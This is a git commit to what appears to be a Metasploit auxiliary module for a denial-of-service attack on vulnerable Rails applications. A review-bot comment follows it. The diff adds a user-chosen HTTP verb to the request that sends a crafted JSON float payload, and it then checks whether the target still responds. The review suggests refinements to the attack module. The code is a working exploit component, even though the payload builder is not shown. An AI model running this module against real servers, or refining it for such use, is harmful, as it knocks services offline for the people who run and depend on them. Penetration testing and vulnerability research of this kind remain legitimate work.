Add user-controlled verbs.

GET, HEAD, POST, and PROPFIND were tested on WebRick, all successful.
bug/bundler_fix
Tod Beardsley 2013-11-25 12:29:05 -06:00
parent 6a28aa298e
commit f311b0cd1e
No known key found for this signature in database
GPG Key ID: 1EFFB682ADB9F193
1 changed files with 9 additions and 4 deletions


@ -36,7 +36,8 @@ class Metasploit3 < Msf::Auxiliary
'DisclosureDate' => 'Nov 22 2013'))
register_options(
[
OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/'])
OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),
OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])
], self.class)
end
@ -44,6 +45,10 @@ class Metasploit3 < Msf::Auxiliary
normalize_uri(target_uri.path.to_s)
end
def verb
datastore['HTTPVERB'] || 'POST'
end
def digit_pattern
@digit_pattern ||= rand(10_000).to_s
end
@ -74,13 +79,13 @@ class Metasploit3 < Msf::Auxiliary
sploit = '['
sploit << evil_float_string
sploit << ']'
print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} request to #{uri}"
print_status "#{peer} - Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"
target_available = true
begin
res = send_request_cgi(
{
'method' => 'POST',
'method' => verb,
'uri' => uri,
'ctype' => "application/json",
'data' => sploit
@ -101,7 +106,7 @@ class Metasploit3 < Msf::Auxiliary
print_status "#{peer} - Checking availability"
begin
res = send_request_cgi({
'method' => 'POST',
'method' => verb,
'uri' => uri,
'ctype' => "application/json",
'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json
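Review bot: The new `verb` helper in the second hunk falls back to 'POST' only when `datastore['HTTPVERB']` is nil or false. An empty or whitespace-only string is truthy in Ruby, so it would presumably reach both `send_request_cgi` calls as the request method, unless the option framework already converts an empty value to nil. Normalising in one place would avoid that, e.g. `v = datastore['HTTPVERB'].to_s.strip` followed by `v.empty? ? 'POST' : v`. The availability check in the last hunk now sends the same verb, so a target that simply rejects that method may be hard to tell apart from one that is unavailable; the response handling is outside the visible lines, so this is worth confirming. The option description could also name the verbs the commit message reports as tested (GET, HEAD, POST, PROPFIND), so operators know what has been verified.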